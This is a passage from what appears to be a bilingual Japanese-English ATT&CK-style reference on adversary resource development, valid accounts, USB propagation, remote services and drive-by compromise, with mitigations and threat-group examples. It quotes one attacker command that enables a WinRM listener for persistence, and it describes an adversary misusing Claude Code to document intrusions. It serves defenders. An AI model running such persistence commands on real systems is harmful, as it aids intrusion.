Tools. Cloud accounts can also be used in the acquisition of infrastructure, such as Virtual Private Servers or Serverless infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or Phishing. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers. 本技法は、企業の防御・制御の範囲外で行われる挙動に基づくため、予防的統制での緩和が難しい。外部に公開されるデータの量と機微性を最小化することに注力すべきである。 この活動の多くは標的組織の可視範囲外で行われるため検知が難しい。後続段階での検知に注力するとよい。 敵対者は標的選定に使える能力（capabilities）を構築することがある。購入・無料ダウンロード・窃取の代わりに、自前で能力を開発しうる。これは開発要件を特定し、マルウェア・エクスプロイト・証明書などのソリューションを構築する過程を指す。 Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle. 敵対者は標的選定に使えるマルウェアおよびその構成要素を開発することがある。ペイロード・ドロッパー・侵害後ツール・バックドア等の開発が含まれる。Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. 敵対者は標的選定に使える自己署名のコード署名証明書を作成することがある。コード署名は実行ファイルやスクリプトに作者を示す電子署名を施す。Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. 敵対者は標的選定に使える自己署名のSSL/TLS証明書を作成することがある。証明書は信頼を植え付けるよう設計されている。Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA). 敵対者は標的選定に使えるエクスプロイトを開発することがある。脆弱性を悪用するコードを自前で作成しうる。Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits. Adversaries may use information acquired via Vulnerabilities to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis. 本技法は、企業の防御・制御の範囲外で行われる挙動に基づくため、予防的統制での緩和が難しい。外部に公開されるデータの量と機微性を最小化することに注力すべきである。 この活動の多くは標的組織の可視範囲外で行われるため検知が難しい。後続段階での検知に注力するとよい。 Kimsuky created and used a mailing toolkit to use in spearphishing attacks. Moonstone Sleet developed malicious npm packages for delivery to or retrieval by victims. Contagious Interview developed malicious NPM packages for delivery to or retrieval by victims. 敵対者は標的選定に使える能力を購入・無料取得・窃取することがある。自前で開発（能力の開発）する代わりに、マルウェア・ソフトウェア・エクスプロイト・証明書などの能力を入手しうる。 Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle. 敵対者は標的選定に使えるマルウェアを購入・窃取・ダウンロードすることがある。Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. 敵対者は標的選定に使えるソフトウェアツールを取得することがある。無料・商用のソフトを入手しうる。Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: PsExec). 敵対者は標的選定に使えるコード署名証明書を購入・窃取することがある。正規の証明書を入手して信頼を悪用しうる。Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. 敵対者は標的選定に使えるSSL/TLS証明書を購入・窃取することがある。Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. 敵対者は標的選定に使えるエクスプロイトを購入・窃取・ダウンロードすることがある。Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors. 敵対者は標的選定に使える脆弱性情報を入手することがある。公開・非公開の脆弱性情報を活用しうる。Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases. 敵対者は標的選定や作戦支援のためにAI（生成AI・LLM等）を入手・利用することがある。Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks, including conducting Reconnaissance, creating basic scripts, assisting social engineering, and even developing payloads. 本技法は、企業の防御・制御の範囲外で行われる挙動に基づくため、予防的統制での緩和が難しい。外部に公開されるデータの量と機微性を最小化することに注力すべきである。 この活動の多くは標的組織の可視範囲外で行われるため検知が難しい。後続段階での検知に注力するとよい。 敵対者は標的選定に使える能力を、自身が取得・侵害したインフラ上に配置（ステージング）することがある。能力をアップロード・インストール・設定して、初期アクセスや実行などの後続段階で使える状態にする。 Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed (Develop Capabilities) or obtained (Obtain Capabilities) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary (Acquire Infrastructure) or was otherwise compromised by them (Compromise Infrastructure). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications. 敵対者はインフラ上にマルウェアをアップロードして後続段階で使える状態にすることがある。Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable Ingress Tool Transfer by placing it on an Internet accessible web server. 敵対者はインフラ上にツールをアップロードして配置することがある。Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: PsExec). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable Ingress Tool Transfer by placing it on an Internet accessible web server. 敵対者は取得・侵害したインフラにSSL/TLS証明書をインストールすることがある。Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it. 敵対者はドライブバイ侵害のため、Webコンテンツを準備・配置することがある。Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in Drive-by Compromise. In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as Application Access Token. Prior to Drive-by Compromise, adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired (Acquire Infrastructure) or previously compromised (Compromise Infrastructure). 敵対者はフィッシングのリンク先となる悪意あるコンテンツを準備・配置することがある。Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in Malicious Link. Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in Spearphishing Link) or a phish to gain initial access to a system (as in Spearphishing Link), an adversary must set up the resources for a link target for the spearphishing link. 敵対者は検索エンジン最適化（SEO）を操作し、悪意あるコンテンツを検索結果の上位に表示させることがある。Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms. 本技法は、企業の防御・制御の範囲外で行われる挙動に基づくため、予防的統制での緩和が難しい。外部に公開されるデータの量と機微性を最小化することに注力すべきである。 この活動の多くは標的組織の可視範囲外で行われるため検知が難しい。後続段階での検知に注力するとよい。 Mustang Panda has used servers under their control to validate tracking pixels sent to phishing victims. 敵対者は標的環境へのアクセスを、第三者（イニシャルアクセスブローカー等）から購入することがある。自前で初期アクセスを得る代わりに、既に侵害済みのアクセスを購入することで、作戦を加速できる。 Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems. In some cases, adversary groups may form partnerships to share compromised systems with each other. 本技法は、企業の防御・制御の範囲外で行われる挙動に基づくため、予防的統制での緩和が難しい。外部に公開されるデータの量と機微性を最小化することに注力すべきである。 この活動の多くは標的組織の可視範囲外で行われるため検知が難しい。後続段階での検知に注力するとよい。 Medusa Group has purchased user credentials and other sensitive data from Initial Access Brokers (IABs). 敵対者は標的選定や作戦支援のためにコンテンツを生成することがある。AIツールを用いて、フィッシング用テキスト、偽のペルソナ向け画像・文章、マルウェアコードなどを大規模に作成しうる。 Adversaries may create or generate content to support targeting and operations. This content may be used to establish personas, impersonate known individuals or organizations, and support Social Engineering, fraud, or influence activities. Written materials, audio, images, video, or other media may be developed and tailored to the target and objective. 敵対者はAIを用いてフィッシング用などのテキストコンテンツを生成することがある。Adversaries may create or tailor written materials to support targeting and malicious operations. Content may include phishing lures, fraudulent financial communications, fabricated job postings, fabricated employment credentials and documentation, decoy documents, social media persona content, and supporting narratives used to sustain fabricated personas over time. Content may be authored manually, commissioned through third parties, or produced using AI-assisted tools. 敵対者はAIを用いて偽の画像・音声・動画（ディープフェイク等）を生成することがある。Adversaries may create or manipulate audio, image, and video content to support targeting and malicious operations. Adversaries may also use synthetic voice recordings, real-time altered audio or video during live interactions, fabricated profile photos and identity documents, or video content depicting fabricated or impersonated individuals. 本技法は、企業の防御・制御の範囲外で行われる挙動に基づくため、予防的統制での緩和が難しい。外部に公開されるデータの量と機微性を最小化することに注力すべきである。 この活動の多くは標的組織の可視範囲外で行われるため検知が難しい。後続段階での検知に注力するとよい。 During the Anthropic AI-orchestrated Campaign, the adversary utilized Claude Code to automatically generate comprehensive documentation throughout the phases of the attack, including discovered services, harvested credentials, sensitive data, exploitation techniques, and complete attack progression. 敵対者は、初期アクセス・永続化・権限昇格・ステルス（防御回避）の手段として、既存アカウントの認証情報を入手し悪用することがある。侵害された認証情報は、防御策を回避したり、リモートシステムや外部サービス（VPN・OWA・リモートデスクトップ等）へアクセスしたりするのに使われ、標的ネットワーク内での権限上昇にもつながりうる。 Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. 敵対者は、初期アクセス・永続化・権限昇格・ステルスの手段として、デフォルトアカウントの認証情報を入手・悪用することがある。出荷時設定の既知の認証情報が悪用されうる。Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes. 敵対者は、ドメインアカウントの認証情報を入手・悪用することがある。ドメインアカウントはActive Directory等で管理され、広範なアクセスを持ちうる。Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services. 敵対者は、ローカルアカウントの認証情報を入手・悪用することがある。単一システムやサービス用に構成されたローカルアカウントが対象。Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. クラウド環境の有効なアカウントは、初期アクセス・永続化・権限昇格・ステルスを敵対者に許しうる。クラウドのIDアカウントが悪用される。Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. 開発者に対し、脆弱性を生まない安全な設計・実装の指針を提供する。 Active Directoryを適切に構成し、攻撃対象領域を縮小する。 ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 アカウントの作成・権限・ライフサイクルを適切に管理する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 ログイン試行回数やロックアウト等のアカウント使用ポリシーを設定する。 有効なアカウントに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems. During Operation Wocao, threat actors used valid VPN credentials to gain initial access. During the SolarWinds Compromise, APT29 used different compromised credentials for remote access and to move laterally. During the 2015 Ukraine Electric Power Attack, Sandworm Team used valid accounts on the corporate network to escalate privileges, move laterally, and establish persistence within the corporate network. During the C0032 campaign, TEMP.Veles used compromised VPN accounts. During HomeLand Justice, threat actors used a compromised Exchange account to search mailboxes and create new Exchange accounts. During Operation MidnightEclipse, threat actors extracted sensitive credentials while moving laterally through compromised networks. Leviathan used captured, valid account information to log into victim web applications and appliances during Leviathan Australian Intrusions. During RedPenguin, UNC3886 used legitimate credentials to gain priviliged access to Juniper routers. During 3CX Supply Chain Attack, AppleJeus has gained access to the 3CX corporate environment through legitimate VPN credentials. During the Anthropic AI-orchestrated Campaign, the adversary used harvested credentials to authenticate against internal APIs, database systems, container registries, and logging infrastructure across targeted networks. Axiom has used previously compromised administrative accounts to escalate privileges. Ke3chang has used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. APT28 has used legitimate credentials to gain initial access, maintain access, and exfiltrate data from a victim network. The group has specifically used credentials stolen through a spearphishing email to login to the DCCC network. The group has also leveraged default manufacturer's passwords to gain initial access to corporate networks via IoT devices such as a VOIP phone, printer, and video decoder. Carbanak actors used legitimate credentials of banking employees to perform operations that sent them millions of dollars. PittyTiger attempts to obtain legitimate credentials during operations. APT29 has used a compromised account to access an organization's VPN infrastructure. APT18 actors leverage legitimate credentials to log into external remote services. Threat Group-3390 actors obtain legitimate credentials using a variety of methods and use them to further lateral movement on victim networks. Lazarus Group has used administrator credentials to gain access to restricted network segments. Sandworm Team have used previously acquired legitimate credentials prior to attacks. Dragonfly has compromised user credentials and used valid accounts for operations. To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes. Suckfly used legitimate account credentials that they dumped to navigate the internal victim network as though they were the legitimate account owner. menuPass has used valid accounts including shared between Managed Service Providers and clients to move between the two environments. FIN7 has harvested valid administrative credentials for lateral movement. OilRig has used compromised credentials to access other systems on a victim network. FIN10 has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor. FIN5 has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment. FIN8 has used valid accounts for persistence and lateral movement. APT33 has used valid accounts for initial access and privilege escalation. Leviathan has obtained valid accounts to gain initial access. FIN4 has used legitimate credentials to hijack email communications. APT39 has used stolen credentials to compromise Outlook Web Access (OWA). Silence has used compromised credentials to log on to other systems and escalate privileges. GALLIUM leveraged valid accounts to maintain access to a victim network. APT41 used compromised credentials to log on to other systems. Wizard Spider has used valid credentials for privileged accounts with the goal of accessing domain controllers. Chimera has used a valid account to maintain persistence via scheduled task. Fox Kitten has used valid credentials with various services during lateral movement. Indrik Spider has used valid accounts for initial access and lateral movement. Indrik Spider has also maintained access to the victim environment through the VPN infrastructure. Silent Librarian has used compromised credentials to obtain unauthorized access to online accounts. LAPSUS$ has used compromised credentials and/or session tokens to gain access into a victim's VPN, VDI, RDP, and IAMs. POLONIUM has used valid compromised credentials to gain access to victim environments. Scattered Spider has used compromised credentials for initial access. Volt Typhoon relies primarily on valid credentials for persistence. Cinnamon Tempest has used compromised user accounts to deploy payloads and create system services. Akira uses valid account information to remotely access victim networks, such as VPN credentials. INC Ransom has used compromised valid accounts for access to victim environments. Star Blizzard has used stolen credentials to sign into victim email accounts. Play has used valid VPN accounts to achieve initial access. Sea Turtle used compromised credentials to maintain long-term access to victim environments. BlackByte has gained access to victim environments through legitimate VPN credentials. UNC3886 has used tools to hijack valid SSH accounts. Medusa Group has utilized compromised legitimate local and domain accounts within the victim environment to facilitate remote access and lateral movement sometimes in combination with PsExec. VOID MANTICORE has leveraged valid accounts to log into VPN infrastructure. VOID MANTICORE has used compromised valid credentials to gain access to management infrastructure and enterprise control systems. VOID MANTICORE has also validated and tested authentication using compromised credentials prior to malicious actions. Adversaries can instruct Duqu to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware. Some SeaDuke samples have a module to extract email from Microsoft Exchange servers using compromised credentials. Linux Rabbit acquires valid SSH accounts through brute force. Dtrack used hard-coded credentials to gain access to a network share. Kinsing has used valid SSH credentials to access remote hosts. Industroyer can use supplied user credentials to execute processes and stop services. LP-Notes has used stolen Windows credentials to log in as the users. 敵対者は、マルウェアをリムーバブルメディアにコピーし、メディア挿入時のAutorun機能を悪用することで、切断された／エアギャップされたネットワーク上のシステムへ移動することがある。 Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself. ハードウェアの接続を制限し、不正な機器の導入を防ぐ。 エンドポイントで悪意ある挙動を検出・防止する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 リムーバブルメディア経由の複製に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 APT28 uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted. Darkhotel's selective infector modifies executables stored on removable media as a method of spreading across computers. FIN7 actors have mailed USB drives to potential victims containing malware that downloads and installs various backdoors, including in some cases for ransomware operations. Additionally, FIN7 has used malicious USBs that acted as virtual keyboards to install malware and txt files that decode to PowerShell commands. Gamaredon Group has replicated to removable media by leveraging the User Assist Reg Key and creating LNKs on all network and removable drives available on the infected host. Tropic Trooper has attempted to transfer USBferry from an infected USB device by copying an Autorun function to the target machine. Mustang Panda has used a customized PlugX variant which could spread through USB connections. Aoqin Dragon has used a dropper that employs a worm infection strategy using a removable device to breach a secure network environment. LuminousMoth has used malicious DLLs to spread malware to connected removable USB drives on infected machines. PlugX has copied itself to infected removable drives for propagation to other victim devices. Part of APT28's operation involved using CHOPSTICK modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic. APT30 may have used the SHIPSHAPE malware to move onto air-gapped networks. SHIPSHAPE targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document. DustySky searches for removable media and duplicates itself onto it. Agent.btz drops itself onto removable media devices and creates an autorun.inf file with an instruction to run that file. When the device is inserted into another system, it opens autorun.inf and loads the malware. Crimson can spread across systems by infecting removable media. Unknown Logger is capable of spreading to USB devices. H1N1 has functionality to copy itself to removable media. USBStealer drops itself onto removable media and relies on Autorun to execute the malicious file when a user opens the removable media on another system. Flame contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using Autorun functionality. njRAT can be configured to spread via removable drives. Ursnif has copied itself to and infected removable drives for propagation. USBferry can copy its installer to attached USB storage devices. Ramsay can spread itself by infecting other portable executable files on removable drives. Stuxnet can propagate via removable media using an autorun.inf file or the CVE-2010-2568 LNK vulnerability. Conficker variants used the Windows AUTORUN feature to spread through USB propagation. QakBot has the ability to use removable drives to spread through compromised networks. ANDROMEDA has been spread via infected USB keys. Raspberry Robin has historically used infected USB media to spread to new victims. HIUPAN has periodically checked for removable and hot-plugged drives connected to the infected machine, should one be found HIUPAN will propagate to the removeable drives by copying itself and accompanying malware components to a directory to the new drive in a hidden subdirectory `<Drive_Letter>:\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\` and hides any other existing files to ensure UsbConfig.exe is the only visible file on the device. 敵対者は、外部公開されたリモートサービスを利用してネットワークへ初期アクセスし、または永続化することがある。VPN・Citrix等のアクセス機構は、外部からの内部ネットワーク接続を許す。 Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management and VNC can also be used externally. 危険なWebコンテンツへのアクセスを制限する。 ネットワークを分割し、横展開や影響範囲を限定する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 ネットワーク越しのリソースアクセスを制限する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 外部リモートサービスに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Night Dragon, threat actors used compromised VPN accounts to gain access to victim systems. During CostaRicto, the threat actors set up remote tunneling using an SSH tool to maintain access to a compromised environment. During Operation CuckooBees, the threat actors enabled WinRM over HTTP/HTTPS as a backup persistence mechanism using the following command: `cscript //nologo "C:\Windows\System32\winrm.vbs" set winrm/config/service@{EnableCompatibilityHttpsListener="true"}`. During Operation Wocao, threat actors used stolen credentials to connect to the victim's network via VPN. For the SolarWinds Compromise, APT29 used compromised identities to access networks via SSH, VPNs, and other remote access tools. During C0027, Scattered Spider used Citrix and VPNs to persist in compromised environments. During the 2015 Ukraine Electric Power Attack, Sandworm Team installed a modified Dropbear SSH client as the backdoor to target systems. During the C0032 campaign, TEMP.Veles used VPN access to persist in the victim environment. ArcaneDoor used WebVPN sessions commonly associated with Clientless SSLVPN services to communicate to compromised devices. During the 2025 Poland Wiper Attacks, threat actors leveraged the FortiGate VPN interface that was exposed to the internet to gain access to the victim environment. Ke3chang has gained access through VPNs including with compromised accounts and stolen VPN certificates. APT28 has used Tor and a variety of commercial VPN services to route brute force authentication attempts. APT29 has used compromised identities to access networks via VPNs and Citrix. APT18 actors leverage legitimate credentials to log into external remote services. Threat Group-3390 actors look for and use VPN profiles during an operation to access the network using external VPN services. Threat Group-3390 has also obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network. Sandworm Team has used Dropbear SSH with a hardcoded backdoor password to maintain persistence within the target network. Sandworm Team has also used VPN tunnels established in legitimate software company infrastructure to gain access to internal networks of that software company's users. Dragonfly has used VPNs and Outlook Web Access (OWA) to maintain access to victim networks. OilRig uses remote services such as VPN, Citrix, or OWA to persist in an environment. FIN5 has used legitimate VPN, Citrix, or VNC credentials to maintain access to a victim environment. Leviathan has used external remote services such as virtual private networks (VPN) to gain initial access. GALLIUM has used VPN services, including SoftEther VPN, to access and maintain persistence in victim environments. Kimsuky has used RDP to establish persistence. APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service. APT-C-36 has used VPNs in their operational infrastructure. Wizard Spider has accessed victim networks by using stolen credentials to access the corporate VPN infrastructure. Chimera has used legitimate credentials to login to an external VPN, Citrix, SSH, and other remote services. GOLD SOUTHFIELD has used publicly-accessible RDP and remote management and monitoring (RMM) servers to gain access to victim machines. TeamTNT has used open-source tools such as Weave Scope to target exposed Docker API ports and gain initial access to victim environments. TeamTNT has also targeted exposed kubelets for Kubernetes environments. Ember Bear have used VPNs both for initial access to victim environments and for persistence within them following compromise. LAPSUS$ has gained access to internet-facing systems and applications, including virtual private network (VPN), remote desktop protocol (RDP), and virtual desktop infrastructure (VDI) including Citrix. Scattered Spider has leveraged legitimate remote management tools to maintain persistent access. FIN13 has gained access to compromised environments via remote access services such as the corporate virtual private network (VPN). Volt Typhoon has used VPNs to connect to victim environments and enable post-exploitation actions. Akira uses compromised VPN accounts for initial access to victim networks. Play has used Remote Desktop Protocol (RDP) and Virtual Private Networks (VPN) for initial access. Sea Turtle has used external-facing SSH to achieve initial access to the IT environments of victim organizations. Velvet Ant has leveraged access to internet-facing remote services to compromise and retain access to victim environments. VOID MANTICORE has leveraged public facing VPN infrastructure to gain initial access to victim environments. Linux Rabbit attempts to gain access to the server via SSH. Kinsing was executed in an Ubuntu container deployed via an open Docker daemon API. Doki was executed through an open Docker daemon API port. Hildegard was executed through an unsecure kubelet that allowed anonymous access to the victim environment. Mafalda can establish an SSH connection from a compromised host to a server. 敵対者は、ユーザーが通常のブラウジングでWebサイトを訪問することを通じてシステムへアクセスすることがある。ブラウザへエクスプロイトコードを送り込む複数の方法があり、正規サイトの侵害や悪意ある広告などが使われる。 Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. Multiple ways of delivering exploit code to a browser exist (i.e., Drive-by Target), including: ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 危険なWebコンテンツへのアクセスを制限する。 アプリを分離・サンドボックス化し、影響範囲を限定する。 エクスプロイト保護機能で脆弱性悪用を防ぐ。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 ドライブバイ侵害に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During C0010, UNC3890 actors likely established a watering hole that was hosted on a login page of a legitimate Israeli shipping company that was active until at least November 2021. During Operation Dust Storm, the threat actors used a watering hole attack on a popular software reseller to exploit the then-zero-day Internet Explorer vulnerability CVE-2014-0322. During the 3CX Supply Chain Attack, AppleJeus compromised the `www.tradingtechnologies[.]com` website hosting a hidden IFRAME to exploit visitors, two months before the site was known to deliver a compromised version of the X_TRADER software package. Axiom has used watering hole attacks to gain access. APT28 has compromised targets via strategic web compromise utilizing custom exploit kits. APT28 used reflected cross-site scripting (XSS) against government websites to redirect users to phishing webpages. Turla has infected victims using watering holes. Darkhotel used embedded iframes on hotel login portals to redirect selected victims to download malware. Threat Group-3390 has extensively used strategic web compromises to target victims. Lazarus Group delivered RATANKBA and other malicious code to victims via a compromised legitimate website. Dragonfly has compromised targets via strategic web compromise (SWC) utilizing a custom exploit kit. Patchwork has used watering holes to deliver files with exploits to initial victims. RTM has distributed its malware via the RIG and SUNDOWN exploit kits, as well as online advertising network <code>Yandex.Direct</code>. APT32 has infected victims by tricking them into visiting compromised watering hole websites. PROMETHIUM has used watering hole attacks to deliver malicious versions of legitimate installers. Magic Hound has conducted watering-hole attacks through media and magazine websites. BRONZE BUTLER compromised three Japanese websites using a Flash exploit to perform watering hole attacks. Leviathan has infected victims using watering holes. Elderwood has delivered zero-day exploits and malware to victims by injecting malicious code into specific public Web pages visited by targets within a particular sector. APT37 has used strategic web compromises, particularly of South Korean websites, to distribute malware. The group has also used torrent file-sharing sites to more indiscriminately disseminate malware to victims. As part of their compromises, the group has used a Javascript based profiler called RICECURRY to profile a victim's web browser and deliver malicious code accordingly. PLATINUM has sometimes used drive-by attacks against vulnerable browser plugins. Dark Caracal leveraged a watering hole to serve up malicious code. APT19 performed a watering hole attack on forbes.com in 2014 to compromise targets. Leafminer has infected victims using watering holes. APT38 has conducted watering holes schemes to gain initial access to victims. Machete has distributed Machete through a fake blog website. Windshift has used compromised websites to register custom URL schemes on a remote system. Windigo has distributed Windows malware via drive-by downloads. Transparent Tribe has used websites with malicious hyperlinks and iframes to infect targeted victims with Crimson, njRAT, and other malicious tools. Andariel has used watering hole attacks, often with zero-day exploits, to gain initial access to victims within a specific IP range. Earth Lusca has performed watering hole attacks. CURIUM has used strategic website compromise to infect victims with malware such as IMAPLoader. Mustard Tempest has used drive-by downloads for initial infection, often using fake browser updates as a lure. Daggerfly has used strategic website compromise for initial access against victims. Winter Vivern created dedicated web pages mimicking legitimate government websites to deliver malicious 